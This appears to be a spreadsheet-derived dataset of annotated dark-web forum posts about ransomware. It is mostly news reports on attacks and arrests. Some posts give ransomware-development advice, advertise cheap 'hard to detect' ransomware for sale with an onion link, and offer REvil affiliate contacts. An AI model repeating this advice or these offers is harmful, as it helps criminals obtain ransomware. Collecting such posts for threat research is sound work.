    <t>as is usual with malware development, the best method for designing better malware is to develop based on new detection methods. the question is not "how do i design a better ransomware?" but instead "how do i defend against ransomware?" read these tips that you find, and use it to develop your malware better. pretend you are a white-hat developer, and use this to develop black-hat.;;as for questions 2 and 3, the answer is no. you have to understand that malware developers are human beings, motivated by their own self-interest. by what way would sharing your brand new techniques or source code benefit you, if you were a malware developer? if you could develop your own malware, why would you not spread it yourself, when spreading is always easier (albeit more tedious) than developing it? i do not want to attack developers who are trying their best to make a dirty buck, but frankly i think that malware source for sale on the darknet is elementary, cheap bullshit. it is a cash-grab against people who think they can make an easy immoral dollar, and it works very well. there is no free lunch, so if someone offers you a chance to make a life-changing amount of money every a day, be skeptical.;;as for learning russian, i would suggest it, very much! russian is an extremely cool/interest language, and if you can delegate even 15 minutes per day, you can learn it. i am personally using anki, and it works very well, for vocabulary at least. this is how i learned english too. you can learn if you want, and if you are serious you should start studying today. one of the best known cybercrime journalists, brian krebs, learned russian by himself. if he can do it, you can too.</t>
  </si>
  <si>
    <t>A post recommending hackers think about how to defend against ransomware vs how to make ransomware in order to imporve their skills</t>
  </si>
  <si>
    <t>/u/ugu</t>
  </si>
  <si>
    <t>39fdbc3e0236b1d1987a</t>
  </si>
  <si>
    <t>Resources for Ransomware Development?</t>
  </si>
  <si>
    <t>0 days 00:40:00</t>
  </si>
  <si>
    <t>12 days 06:48:00</t>
  </si>
  <si>
    <t>first, i would learn about cryptography because that is the generalization of ransomware development.;other than that it is mainly malware still, user-mode rookit, code injection, and more to remain secure and solid on the system.;i would read and research ntapi programming, and how ntoskrnl operates at a low-level.;;best regards</t>
  </si>
  <si>
    <t>User suggesting to learn about cryptography under the impression that it influences ransomware development</t>
  </si>
  <si>
    <t>/u/LD_PRELOAD</t>
  </si>
  <si>
    <t>0 days 01:20:00</t>
  </si>
  <si>
    <t>you may not find people writing guides on dissecting ransomware because most of rw source codes aren't released.;;i remember reading about in a book like a year ago but i have no idea which book.;i don't think writing your own rw from scratch is worth the time(this applies to writing rats , keyloggers , stealers , clippers , botnet and other malwares);;it's not worth purchasing a source code. i'll post a guide on coding and improving ransomware if you want me to.</t>
  </si>
  <si>
    <t>User stating reasons as to why ransomware guides are not being created</t>
  </si>
  <si>
    <t>1 days 03:10:00</t>
  </si>
  <si>
    <t>i need someone who can reverse engineer ransomware for me, or tell me how to do so. we will come down to a deal, i daily receive 2 to 3 such cases for sue and people of my country will never pay for ransom over a text file note</t>
  </si>
  <si>
    <t>User asking for information on how to reverse engineer ransomware</t>
  </si>
  <si>
    <t>/u/IAMHITLERMAYBE</t>
  </si>
  <si>
    <t>3bf224865b63d4f38b0a</t>
  </si>
  <si>
    <t>Reverse Engineer Ransomware</t>
  </si>
  <si>
    <t>1 days 02:45:00</t>
  </si>
  <si>
    <t>people do not pay for ransom notes, they pay for their files :) that's the whole purpose behind ransomware.</t>
  </si>
  <si>
    <t>0 days 02:03:00</t>
  </si>
  <si>
    <t>ah, if the ransomware is properly implemented - there is literally no way to recover the files. the ransomware either overwrites or copies, encrypts and then clears the original file (by "shredding" it).;;as for the algorithms, if the ransomware uses standard and secure algorithms you can't attack it from that front. you can view this on the idransomware website, by copying one encrypted file and a ransom note. it will show you if the ransomware is decryptable or not usually (there is a list of supported ransomware).;;however. if the ransomware is any good, you won't be able to do anything unless you pay for decryption.</t>
  </si>
  <si>
    <t>0 days 04:35:00</t>
  </si>
  <si>
    <t>romanian law enforcement authorities have apprehended a total of five suspects linked with closely related malware attacks. three of the suspects allegedly infected hundreds of thousands of computer systems across the globe by spreading two particularly destructive families of ransomware���cerber and curvetorbitcoin (ctb) locker malware.;;the cerber ransomware infected over 200,000 computers, and stole an estimated 2 million usd. the ransomware was one of the first to use tor. it gained such notoriety, mcafee declared i"malware of the year"(not necessarily a prestigious award).;;full clearnet article: https://darkwebnews .com/news/romania-arrests-curvetorbitcoin-malware-suspects/</t>
  </si>
  <si>
    <t>post about romanian law enforcement arresting 5 people responsable for spreading malware (including ransomware)</t>
  </si>
  <si>
    <t>/u/iHome357</t>
  </si>
  <si>
    <t>21/07/2018 07:32</t>
  </si>
  <si>
    <t>/d/DarkNetMarketBusts</t>
  </si>
  <si>
    <t>7621842af3141f62abaa</t>
  </si>
  <si>
    <t>Romanian Authorities Arrest Suspects Linked to Two Major Ransomware Variants</t>
  </si>
  <si>
    <t>1 days 17:32:00</t>
  </si>
  <si>
    <t>i mean. aside from getting caught i reckon it's quite prestigious, unless you want zero attention or something.</t>
  </si>
  <si>
    <t>/u/MJA20WithA3</t>
  </si>
  <si>
    <t>21/07/2018 09:54</t>
  </si>
  <si>
    <t>well it's certainly better for opsec to not be talk of the town</t>
  </si>
  <si>
    <t>22/07/2018 07:05</t>
  </si>
  <si>
    <t>0 days 21:11:00</t>
  </si>
  <si>
    <t>yeah but man if i could create a piece of software capable of that..</t>
  </si>
  <si>
    <t>22/07/2018 19:17</t>
  </si>
  <si>
    <t>0 days 12:12:00</t>
  </si>
  <si>
    <t>;read this article on deepwebfeed;;a global epidemic of digital extortion known as ransomware is crippling local governments, hospitals, school districts and businesses by scrambling their data files until they pay up. law enforcement has been largely powerless to stop it.;;one big reason: ransomware rackets are dominated by russian-speaking cybercriminals who are shielded ��� and sometimes employed ��� by russian intelligence agencies, according to security researchers, u.s. law enforcement, and now the biden administration.;;on thursday, as the u.s. slapped sanctions on russia for malign activities including state-backed hacking, the treasury department said russian intelligence has enabled ransomware attacks by cultivating and co-opting criminal hackers and giving them safe harbor. with ransomware damages now well into the tens of billions of dollars, former british intelligence cyber chief marcus willett recently deemed the scourge ���arguably more strategically damaging than state cyberalue of kremlin protection isn't lost on the cybercriminals themselves. earlier this year, a russian-language dark-web forum lit up with criticism of a ransomware purveyor known only as ���bugatti,��� whose gang had been caught in a rare u.s.-europol sting. the assembled posters accused him of inviting the crackdown with technical sloppiness and by recruiting non-russian affiliates who might be snitches.;;worst of all, in the view of one long-active forum member, bugatti had allowed western authorities to seize ransomware servers that could have been sheltered in russia instead. ���mother russia will help,��� that individual wrote. the conversation was captured by the security firm advanced intelligence, which shared it with the associated press.;;���like almost any major industry in russia, (cybercriminals) work kind of with the tacit consent and sometimes explicit consent of the security services,��� said michael van landingham, a former cia analyst who runs the consultan alone last year, ransomware struck more than a hundred federal, state and municipal agencies, upward of 500 hospitals and other health care centers, some 1,680 schools, colleges and universities and hundreds of businesses, according to the cybersecurity firm emsisoft.;;damage in the public sector alone is measured in rerouted ambulances, postponed cancer treatments, interrupted municipal bill collection, canceled classes and rising insurance costs ��� all during the worst public health crisis in more than a ce</t>
  </si>
  <si>
    <t>Article describing how the russian govermnt is giving asylum and assistance to certain ransomware groups</t>
  </si>
  <si>
    <t>28/04/2021 15:24</t>
  </si>
  <si>
    <t>5b41dcac3d4123663f4e</t>
  </si>
  <si>
    <t>Russia Giving Ransomware Purveyors Safe Haven</t>
  </si>
  <si>
    <t>{'extortion': 1, 'ransomware': 7}</t>
  </si>
  <si>
    <t>;read this article on deepwebfeed;;the united states is mired in a new kind of conflict with russia, one in which non-state actors are launching cyber attacks under the cover of a digital smokescreen that complicates attribution and efforts to retaliate against the enemy.;;source: newsweek / msn;;in the eyes of the u.s. intelligence community, to a certain extent this enemy includes the kremlin itself, but mostly it spans an array of shadowy groups whose direct association to the russian president vladimir putin's government is suspected but not entirely clear, much less demonstrable.;;but the intelligence officials newsweek spoke to are certain about one thing: the situation works to moscow's advantage.;;their reasoning is twofold.;;"first, because of global perception as they are trying to increase influence and standing in the world," one u.s. military intelligence official, who asked not to be named, told newsweek. "secondly, russian cyberattacks can typically be traced either directly or indirectly to the kremlin and even putin himself. they would not want the russian government connected to an event like that, so they need a non-attributable method or means to achieve their desired effects.";;obfuscating attribution has been a key element of russia's military strategy, even in the physical realm.;;a recent example of this technique was seen in ukraine following the political unrest in 2014 that ousted a kremlin-friendly government that had resisted western overtures. sensing a threat to russia's interests in crimea, a largely ethnic russian peninsula that houses the headquarters of the black sea fleet, putin deployed patchless troops that came to be known to locals as "little green men" or "the polite people"���a term that came to be used within russia's own military circles.;;within weeks, a referendum would see crimea annexed by russia, though the results of this vote remain unrecognized by ukraine or its western partners, including the u.s. today, such hybrid warfare techniques appear to be playing out with far more sophistication in cyberspace, and their scope has grown to include the u.s. homeland.;;this u.s. military intelligence official with whom newsweek spoke described the process of ascertaining to what degree russian involvement was suspected in some of the recent cyberattacks against the country, including last year's solarwinds hack, in which countless institutions from federal agencies to fortune 500 companies were believed to have been affected.;;"an intel assessment is made with varying levels of confidence based on the analysis of information derived from multiple sources," the official said. "it is used to establish predictive patterns or a tool for informed decision-making, whereas a criminal investigation is collecting testimony and evidence to connect a specific activity to a specific individual, entity, or group of actors, or to determine no criminal activity was performed.";;but even if the investigation produces strong leads, building a case to fight is another issue. such an intelligence assessment, the official said, "could provide a level of confidence, but it would not be used as prosecuting material.";;"an assessment does not equate to evidence," the official added.;;j.d. cook, a former senior cia official, also acknowledged the unprecedented complexity of proving the perpetrator of an advanced cyber operation. this stems not only from the inherent origin-tracing challenge on the digital front, but also in inadvertently revealing the secrets of u.s. cyber tools and methods in the process.;;"attribution is hard, because true disclosure would reveal sources and methods," cook told newsweek, "therefore tipping the opposition off. ";;he saw the answer in the work of other non-state actors, not the criminal kind lurking in the shadows, but the private sector forces operating on behalf of companies, and sometimes governments as well.;;"the research of private sector firms such as kaspersky, crowdstrike, eset and mandiant/fireeye provides governments open source methods to disclose the cyber activities of, say, the russians or north koreans," cook said.;;leading cybersecurity firm fireeye was the first to disclose last december that its supply chain had been infiltrated by an elite hack, which was used to penetrate and trojanize a software update of software company solarwinds' orion product. the discovery led to a series of events that saw u.s. agencies including the department of homeland security's cybersecurity and infrastructure security agency, department of justice's fbi and the pentagon's u.s. cyber command scramble to shore up the nation's digital defenses.;;even before coming to office, president joe biden vowed not only to double down on efforts to prevent such intrusions, but also to hold those behind them accountable. for solarwinds, he called out russia directly and issued sanctions against entities and individuals in april.;;the following month, however, the nation was targeted by back-to-back ransomware attacks affecting the country's largest gas artery, the colonial pipeline, and u.s. locations of the world's top beef producer, jbs. both companies were paralyzed, and ultimately paid out millions of dollars to resume operations.;;it's not necessarily the money, however, but the implications for u.s. infrastructural security that resounds in the national conscience, and raises the most serious geopolitical questions regarding washington and moscow's rivalry.;;these ransomware attacks were claimed by darkside and revil, respectively, two hacker collectives believed to be operating within russia or in nearby satellite states of the former soviet union. in these two cases, the biden administration has stopped short of blaming russia outright for orchestrating the attacks, but has demanded that putin work to crack down on such activities within his jurisdiction.;;when the two men met for their debut bilateral summit earlier this month, both had cyber issues on their agenda.;;in the days since their high-level sit-down, russian officials have appealed for greater bilateral contact on cyber issues, a key request that putin has reiterated for months, dating back to trump's last days in office. on thursday, the russian leader's security chief pledged thursday to take action against any such illicit activity within russia's borders as part of an arrangement that;... character limit reached, read the rest of this article on deepwebfeed;/</t>
  </si>
  <si>
    <t>Article discussing the conflict between US and Russian in regards to cybercrime (including ransomware)</t>
  </si>
  <si>
    <t>30/06/2021 18:13</t>
  </si>
  <si>
    <t>68913dd8593355c9e02f</t>
  </si>
  <si>
    <t>Russia's Little Cyber Green Men Versus the U.S. Digital Army</t>
  </si>
  <si>
    <t>a team of researchers has recently revealed that a russian cybercriminal, who uses the moniker m1x, attacked the website portal of a mexican government agency. it is reported that the hacker went on to release taxpayer ids belonging to 14,000 mexican taxpayers after the government failed to meet the ransom demands of the cyberattack.;;the ceo of lucy security, the security awareness firm that broke news of the incident, intimated that the researchers stumbled upon the case on a cybercriminal platform in the dark web.;;data leaked on a public cloud service;;according to ceo colin bastable, the hacker first made an announcement that he was expecting payment in crypto on the morning of june 7. it turns out that the government workers lacked experience dealing in crypto and could not make the bitcoin payment that was demand ��� an aspect that prevented further agreement to terms.;;consequently, by june 10, m1x had released a huge data dump including 100gb of sensitive data in custody of the mexican governme exposed the same on a public cloud service.;;speaking on the value of leaked data, bastable acknowledged the scale of credentials that were accessed by the hacker. the taxpayer id numbers that were released are said to include physical addresses to where the real identities reside, and their phone numbers.;;in addition, the ceo said that the cybercriminal went on to release an unspecified number of police records.;;shifting goalposts;;in an interesting twist to the case, bastable said that m1x made a shift from his original demands ��� he acted in contravention to his initial plan. considering that he gave the mexican government a five-day ultimatum to submit the payment in ransom, it turns out that the hacker leaked the data two days before the deadline elapsed.;;according to the ceo, there is no clear answer as to why m1x changed the course of his plan, although it is evident that he sought to intensify his pressure on the government.;;as witnessed in the past, ransomware attacks are marked by time lthat are meant to pile psychological pressure on a victim. typical cases are usually accompanied by the theft or deletion of breached data from the target���s servers permanently. the significance of crypto payment demands have become commonplace since such transactions are difficult to track.;;otherwise, although the occurrence of auctions is common to ransomware attacks like these, bastable noted that the hacker opted to leak the data on a cloud service at the public���s disposal. further, the official stated that the hacker���s primary motivator was monetary, and that the possibility that m1x is planning to release more data in the near future remains high.;;who is m1x?;;while confirming the identity of hacker m1x, alex trafton, a director at the security firm pinkerton, weighed in on the case and intimated that the cybercriminal has been operating for many years.;;trafton also confirmed that the hacker was russian after speaking to a russian translator to analyze the texts written by thetherwise, the director stated uncertainty as far as m1x���s ties to the russian government is concerned. this question is premised on longstanding reports that the russian government has been known to collaborate with hackers in targeting foreign governments and corporations.;;similarly, bastable reiterated on m1x���s years of experience in targeting companies and governments. this knowledge is pegged on the realization that the russian cybercriminal has been visiting a dark web hacking website since the year 2009.;;in conclusion, the ceo issued a warning to all mexicans in light of the recent data leak. in his account, such leaked data presents a plethora of physical and cy</t>
  </si>
  <si>
    <t>news article related to the release of 14,000 peoples tax payer information</t>
  </si>
  <si>
    <t>16/06/2020 10:46</t>
  </si>
  <si>
    <t>23cc729a923e2ad8c00c</t>
  </si>
  <si>
    <t>Russian Hacker Releases at Least 14,000 Mexican Taxpayer IDs</t>
  </si>
  <si>
    <t>an la school district has confirmed that it has fallen victim to a vicious ransomware attack over labor day weekend. the details currently available are scarce, it has not been revealed whether data from the schools have actually been stolen or rather just encrypted. however a russian-speaking ransomware group that goes by 'vice society' has taken credit for it. there isn't a whole lot of information available quite yet, but according to a twitterthread from jeremy kirk :;;the only surprising aspect of the recent ransomware attack against @laschools;, the country���s second-largest district, is that it didn���t happen sooner. here are results from an internal and external penetration test done in sept. 2020. #infosec pic.twitter.com/anjtwodaao;;just to set the scene, here's a summary of just how big and complex @laschools;network is. internal network: 259,200 services, 85,241 web services, 57,765 other services. 116,219 misc services, including ssh, pop3 and ntp.;;crowe tested as if it was an unaunnected to a restricted network. crowe found major apps in the data center "were properly segmented from the basic user network" there were 109 externally exposed services: 77 web services, 8 voip, 24 misc. lausd hosted all of those.;;"significant risks" were found around @laschools;password controls, detection/alerting, patching, "guessable sql" creds, internal email spoofing, social engineering and anonymous access to file servers. #cybersecurity #ransomware;;;i will update this post as more solid news comes out, right now they are just assessing the damage. the few details we have are technical.;;here are some links that dive into this attack. i personally find it interesting that the adversaries chose a;school district;, out of all things, to hold ransom...;;;;https://techcrunch.com/2022/09/09/los-angeles-schools-ransomware/;;https://www.databreachtoday.com/la-school-district-forewarned-malware-attack-risks-a-20031;;https://www.npr.org/2022/09/07/1121422336/a-cyberattack-hits-the-los-angeles-school-district-raising-alarm-across-the-coun;;https://twitter.com/jeremy_kirk (security expert and editor for ismg corp who tweeted extensively on this case);</t>
  </si>
  <si>
    <t>Post describng a ransomware attack on a school in the US (los angeles)</t>
  </si>
  <si>
    <t>/u/dont_be_an_eep</t>
  </si>
  <si>
    <t>58715c727dda2f7f2905</t>
  </si>
  <si>
    <t>Russians conduct ransomware attack on schools in LA</t>
  </si>
  <si>
    <t>2 days 07:07:00</t>
  </si>
  <si>
    <t>what they found there ? data or just score cards ?</t>
  </si>
  <si>
    <t>Post describng a ransomware attack on a school in the US (los angeles) - Request as to what information was stolen</t>
  </si>
  <si>
    <t>i believe they found student data..potentially social security numbers i would presume? i just can't imagine why these russians would deploy such a large scale attack with seemingly very little payoff..</t>
  </si>
  <si>
    <t>Post describng a ransomware attack on a school in the US (los angeles) - responding to the request asking what they solved</t>
  </si>
  <si>
    <t>;for the more detailed version including images visit;chronos;;by combining multiple vulnerabilities, a security researcher managed to infect a canon eos80d with wlan via ransomware. the malware encrypts all photos stored on the sd card - without any intervention from the camera owner. initially, the infection could only be prevented by deactivating the wlan interface; now there is a firmware update from canon, which eliminates the vulnerabilities.;ransomware attacks on the eos80d in the wild, the manufacturer has not yet observed.;;;dslr would be rewarding targets;;as pointed out by eyal itkin of check point research during his;def con 27 presentation;, dslrs are ideal ransomware targets: the data stored on the sd cards are important to photographers - financially relevant in the case of professionals too - and the camera owners are typically well-funded. the likelihood that the ransomware makers get their ransom is therefore comparatively high.;;the researcher has therefore made the search for vulnerabilities in the firmware of the canon camera and was on several occasions. he concentrated on the implementation of the picture transfer protocol (ptp) used by all modern cameras. according to itkin, ptp is an ideal target because it has a good 150 different functions, can not use any authentication or encryption, and can communicate via usb as well as via tcp / ip - and thus also via wlan.;;the researchers documented the sometimes elaborate analysis needed to detect each individual bug in a;blog entry;at check point. altogether itkin exploited six vulnerabilities to install the ransomware on the camera.;;;ransomware installed as a camera-update;;the bugs found by itkin not only make it possible to send arbitrary firmware via wi-fi to the dslr without the intervention of the camera owner. also, when installing the aes encrypted firmware helped an at least unfortunate design decision of the manufacturer: canon uses two symmetric aes keys, which are found in the firmware. one of the keys is for encoding and decoding data, one for signing and verifying code. the researcher did not have to break the encryption, but simply had his firmware, which had been added to the ransomware functions, signed by his existing camera.;;the quiet installation of the ransomware again takes over a ptp function. itkin then uses canon's own encryption commands via aes to encode the images stored on the sd card.;;;firmware update available;;canon has confirmed the existence of all vulnerabilities in a;security note;and closed them by an update. itkin, however, assumes that other canon models or cameras from other manufacturers are similarly vulnerable. to accelerate future firmware analysis, itkin has released thumbsup, an open source plug-in for the disassembler ida pro on;github;.;;in order not to fall victim to a real ransomware attack as the owner of another camera model, currently only the temporary deactivation of bluetooth and wireless lan would remain.</t>
  </si>
  <si>
    <t>Information about a ransomware that encrypts all photos on canon cameras</t>
  </si>
  <si>
    <t>13/08/2019 10:25</t>
  </si>
  <si>
    <t>10db8877f857e57f0206</t>
  </si>
  <si>
    <t>SLRs with Ransomware infectable</t>
  </si>
  <si>
    <t>;;slrs with ransomware infectable;;by;/u/chronos;���;3 years ago;in;/d/chronos;;1 points;���;</t>
  </si>
  <si>
    <t>13/08/2019 10:26</t>
  </si>
  <si>
    <t>122b2c2b01ece1f396be</t>
  </si>
  <si>
    <t>;read this article on deepwebfeed;;safeguard cyber, a cloud platform designed to protect assets from cybersecurity threats and risk factors, today announced it has raised $45 million in a mix of equity and debt. this brings safeguard���s total raised to over $69 million and will be used to expand its business and technology capabilities, the company says.;;in a 2017 deloitte survey, only 42% of respondents considered their institutions to be extremely or very effective at managing cybersecurity risk. the pandemic has certainly done nothing to alleviate these concerns. despite increased it security investments companies made in 2020 to deal with distributed it and work-from-home challenges, nearly 80% of senior it workers and it security leaders believe their organizations lack sufficient defenses against cyberattacks, according to idg.;;safeguard cyber, which was founded in 2014, develops products that identify risks in communication channels such as social media, chat apps, and collaboration platforms ke slack, linkedin, and whatsapp. safeguard cyber also helps companies take action and claims it can shield high-profile or targeted individuals from account takeovers, spearphishing, malicious content, threats of violence, and misinformation, as well as bad actor connections. moreover, safeguard says it can protect enterprise and employee accounts from inbound threats, including brand impersonation, while providing visibility into potential threat vectors.;;���social engineering has traditionally been carried out within emails but has since evolved to incorporate a more targeted, soft-attack approach across social media, collaboration, and mobile chat channels where traditional security defenses simply do not detect and stop such attacks,��� cofounder and ceo jim zuffoletti told venturebeat via email. ���attackers also now realize that mass attacks have a low conversion rate and that targeted spearfishing, while more time-intensive, has a much higher success rate. from a cybercriminal��al engineering is the perfect means to deliver a broad array of damaging exploits, such as ransomware that encrypts company data, or attacks that are focused on cyberespionage.���;;according to a 2017 microfocus report, up to 463 billion gigabytes of data will be generated every day by 2026. to accommodate the coming influx, organizations are beginning to transform operations models through the adoption of ai to optimize, enhance, and automate threat and risk visibility, detection, and response capabilities, zuffoletti says.;;to this end, safeguard cyber leverages an ai-powered engine called threat cortex that detects and spotlights risks across different attack surfaces. threat cortex searches the dark and deep web to surface attackers and risk events, automatically notifying it team members when an anomaly crops up. using safeguard cyber, admins can quarantine unauthorized data from leaving an organization or specific account. it allows them to lock down and revert compromised accounts back to an earlncompromised state.;;���threatcortex allows for transparency in [machine learning] models���, ���offers data analytics���, and manages features and natural language programming building blocks as configurable rules that are used for scoring by the machine learning,��� a safeguard cyber spokesperson explained. ���since we support different types of models in the platform that range from out of the box to highly configurable, it is possible to avoid the need to ���create��� models for each customer.���;;on the compliance side of the equation, safeguard cyber offers a tool that taps ai to alert employees, customers, and partners if their digital communications are at risk of violating regulations like the financial industry regulatory authority and financial conduct authority. the platform flags stakeholders about risk assessments in real time, prioritized by machine learning algorithms. it also captures records autonomously with audit trails and archives conrisk management market was valued at $6.25 billion in 2018 and is projected to reach $18.5 billion by 2026, according to allied market research. safeguard cyber has rivals in risklens, riskiq, privacera, and aclaimant, a data-driven safety and risk management platform for the workplace. there���s also logicgate, which raised $24.75 million in december 2019 to help automate corporate governance, risk, and compliance processes.;;despite the competition, charlottesville, virginia-based safeguard cyber, which has 78 employees, says its products saw ���tremendous��� growth in 2020 as enterprises increasingly turned to digital channels during the pandemic. the company counts some of the biggest names in financial services, pharmaceuticals and health care, education, technology, government, sports, media, and entertainment among its customers, zuffoletti claims. at present, the company manages over 500,000 user and company accounts.;;for one pharmaceutical client, safeguard cyber���s platformnotes from customer service interactions. safeguard cyber claims this has enabled the client to gain productivity and analytical insights, satisfying its digital transformation goals.;;���safeguard cyber achieved 100% supervision coverage of free text call note reporting, powered by language-agonistic machine learning. initial results indicated that these controls were warranted, as the system flagged over 200 significant company policy violations for investigation within just the first few months of operation,��� the spokesperson said. ���today, safeguard cyber is monitoring up to 100,000 call records per day, in multiple languages, with a less than 1% false positive rate. as a result, the company has been able to cut manual review costs by $3 million per month.���;;nightdragon led safeguard cyber���s strategic growth round announced today, with participation from cisco investments and p</t>
  </si>
  <si>
    <t>Article about a cybercrime company Safeguard gaining $45 million to increase cybercrime security</t>
  </si>
  <si>
    <t>26/04/2021 19:16</t>
  </si>
  <si>
    <t>c1eb982f43e293caf80e</t>
  </si>
  <si>
    <t>SafeGuard Cyber Nabs $45M to Combat Cybersecurity Risks Using AI</t>
  </si>
  <si>
    <t>;read this article on deepwebfeed;;it was a warm mid-september morning and jeff pelzel was preparing for another day of school. although the coronavirus pandemic raged across southern california, pelzel, superintendent of the newhall school district in the santa clarita valley, had successfully transitioned nearly 6,000 students and teachers to virtual classrooms.;;as he walked to the office, pelzel checked his phone and noticed something strange. his email app, which was usually brimming with fresh messages, was empty. he tapped the browser and navigated to the school's webmail. nothing. his palms began to sweat as powered on his pc. the warning that flashed across his screen was terrifying. in bold letters the message bluntly stated that his entire school district was locked up and offline. pelzel shot a text message to it, but he didn't need to wait for a response to know what was happening.;;this spring, thousands of administrators, teachers and students weary from fighting covid-19 face a new viral threat: ransomware. cyberattacks and ransomware targeting schools hit record highs last year, with k-12 schools the top targeted sector. the average ransom is about $50,000, but the biggest hauls have topped $1.4 million.;;schools are now the most popular targets of ransomware attacks, according to the fbi. the total cost of cyberattacks targeting the education sector is difficult to estimate because many schools don't report attacks. according to a report from ibm, nearly one in every four cyberattacks in the u.s. involves ransomware. the total cost likely exceeds $123 million.;;;why schools are a target;;several factors make schools and educators easy targets for ransomware. according to ibm, educators and students ��� already spread thin by virtual learning ��� lack training in how to deal with such attacks, while school funding for security is modest.;;while most educators said they rely on virtual and remote learning tools, 60% of teachers say they have received no additional security training duremic, and half of the respondents have not received any cybersecurity training. most teachers get little tech support.;;according to the fbi, cybercriminals are hitting schools with tools and tactics they initially found to be effective against businesses. the zeus trojan, for example, is malware that targets microsoft windows machines running on school computers and sends stolen data back to criminals' servers, where it is held hostage or sold on the dark web.;;funding is a critical roadblock that prevents school districts from investing in cybersecurity training and tools, said ibm's chris scott. school administrators are the most likely to be trained in cybersecurity, but districts lack the budget to also train teachers. in spite of the astronomical costs associated with ransomware attacks that target schools, most school districts don't have a cybersecurity insurance plan.;;while most administrators agree that classroom spending should increase, they also agree that additional investments in it would help protect teachers and students. more than a third of k-12 administrators say their school districts employ just one to three it staffers.;;it's unreasonable to expect educators and administrators to be cybersecurity experts, scott said, but even underfunded it departments can help educators by providing low-cost best-practice security training, in techniques like spotting malicious emails ��� the most common vector for a ransomware attack, according to sc"give [teachers] that moment to question and to understand the risk. when people know what to look for, they tend to make the right decision," scott said. he recommends it departments focus on simple techniques, like how to spot a phishing email and how to turn on and use two-factor authentication.;;;"professional criminals are breaking in";;"my first thought was that the timing can't get any worse," pelzel said of last year's ransomware attack. "the kids are reliant on [technology] for an education and now we don't have access to those devices.";;but in the moments following the attack, pelzel and his it department made a series of hard but good decisions. he instructed his it managers to immediately pull the systems down and transition to in-person learning and the cloud. the newhall schools were offline for eight days.;;then he sprang into action. "we wanted to make sure that kids had grade-level appropriate materials. our teachers came to the rally, the district office, the instructional services department," he said. teachers and parents all pulled together to get multilingual books, pencils and even cloud-based chromebooks into student's hands.;;pelzel thinks his school dodged a bullet. he is calling for federal and state leaders to crack down on cybercriminals targeting schools and to provide funding for schools to harden their cyber infrastructure.;;"professional criminals are breaking in and hacking school systems. this is happening to fortune 500 companies who have millions of dollars [for cyberdefense]," pelzel said. "how can you expect k-12 school districts who do not have those resources to prevent this from happening?"</t>
  </si>
  <si>
    <t>Article about how schools have become the leading target of ransomware attacks</t>
  </si>
  <si>
    <t>13/03/2021 17:24</t>
  </si>
  <si>
    <t>71fd5b9e61d3b02edbe6</t>
  </si>
  <si>
    <t>Schools Have Become the Leading Targets of Ransomware Attacks</t>
  </si>
  <si>
    <t>;read this article on deepwebfeed;;sepa's email system is still down almost a month after the initial breach. the scottish environmental protection agency (sepa) is still responding to an ongoing ransomware attack it identified on christmas eve, which has knocked many of its critical it systems offline.;;according to sepa, an initial investigation suggests that a highly organised, international cyber-crime group is behind the attack, intending to disrupt sepa's public services and extort public funds. the agency's email system is still down almost a month after the initial attack, and some internal systems and external data products will remain offline in the short term.;;despite that, sepa has adapted priority services like flood forecasting and monitoring to the situation, and they continue to operate. many of the infected machines have been isolated, though sepa believes entirely new systems will be required for the services to return to normal.;;the cyber criminals only stole about 1.2gb of data in the ransomware attack - a tiny amount, in modern data terms. it included employee information, business and procurement data, and details of some projects.;;sepa is working with the national cyber security centre (ncsc), scottish government and police scotland to mitigate the attack and identify the hackers. it also says it is taking professional advice from cyber security experts for the recovery of its affected systems.;;while sepa did not discuss what form of ransomware it has been hit with, the operators behind conti ransomware have reportedly published data they claim belongs to sepa. stealing confidential data from victims has become increasingly common for ransomware gangs.;;in june last year, the actors behind the revil ransomware launched an auction site, 'the happy blog', to sell data stolen from companies it had compromised.;;the group posted samples of data belonging to canadian firm agromart group, and claimed that scanned copies of agromart's financial accounts, agreement forms and credit application, personal net worth documents and users' age records were among the data available for auction.;;in march 2020, three ransomware groups - nefilim, the clop and the sekhmet - also established websites to publish the sensitive data of non-payers. earlier this month, the operators of the pysa (or mespinoza) ransomware published what they claimed to be documents stolen from the hackney borough council on a dark web forum.;;the hackers said they were behind the october cyber attack on the council, which disrupted its online services and left many of the systems inoperable four months ago.</t>
  </si>
  <si>
    <t>Artcile about the ransomware attack on SEPA and the long lasting impacts</t>
  </si>
  <si>
    <t>21/01/2021 19:44</t>
  </si>
  <si>
    <t>a9323dc22c85eea8b7cd</t>
  </si>
  <si>
    <t>Scottish Environmental Protection Agency Confirms Ongoing Ransomware Attack</t>
  </si>
  <si>
    <t>{'revil': 1, 'ransomware': 8}</t>
  </si>
  <si>
    <t>hello everyone am presenting this simple ransomware to you all, which is easy to use and customize to your taste. the file size is very small and hard to detect. screenshot in link below. am selling this for $100 for a limited time and only to 20 people.;;http://felixxxboni3mk4a.onion/img/uploads/181207/felixxx_005209_mqh_chucky.jpg;;my jabber is in the screenshot</t>
  </si>
  <si>
    <t>Someone advertising their new simple ransomware</t>
  </si>
  <si>
    <t>/u/chuckybaby</t>
  </si>
  <si>
    <t>5ae19129a8f5f4fe7506</t>
  </si>
  <si>
    <t>Simple Ransomware</t>
  </si>
  <si>
    <t>0 days 08:11:00</t>
  </si>
  <si>
    <t>sodinokibi (aka revil) has been one of the most prolific ransomware as a service (raas) groups over the last couple years. the ransomware family was purported to be behind the travelex intrusion and current reports point to an attack against acer for a reported $50 million ransom demand.;;https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/;;sample photo.;;https://anonfiles.com/ufn75fnbuc/photo_2021-03-29_19.03.14_jpeg</t>
  </si>
  <si>
    <t>Post about the revil ransomware gang including information about their involvement in the travelex attack</t>
  </si>
  <si>
    <t>/u/TheSigaieu</t>
  </si>
  <si>
    <t>29/03/2021 15:04</t>
  </si>
  <si>
    <t>01e151a53ec9da0f9819</t>
  </si>
  <si>
    <t>Sodinokibi (aka REvil) Ransomware.</t>
  </si>
  <si>
    <t>44 days 14:44:00</t>
  </si>
  <si>
    <t>{'sodinokibi': 1, 'ransomware': 2}</t>
  </si>
  <si>
    <t>yes;and they have affiliate program with only 20 teams working infects for  them;and only with russian speakers they work;;i have their contacts;but i doubt anyone from here would be suitable</t>
  </si>
  <si>
    <t>31/03/2021 04:39</t>
  </si>
  <si>
    <t>the sodinokibi ransomware has started to accept the monero cryptocurrency and has announced future plans to discontinue altogether receipt of bitcoin payments. for the time being, they are charging 10% extra for ransoms paid in bitcoin.;;https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-to-stop-taking-bitcoin-to-hide-money-trail/</t>
  </si>
  <si>
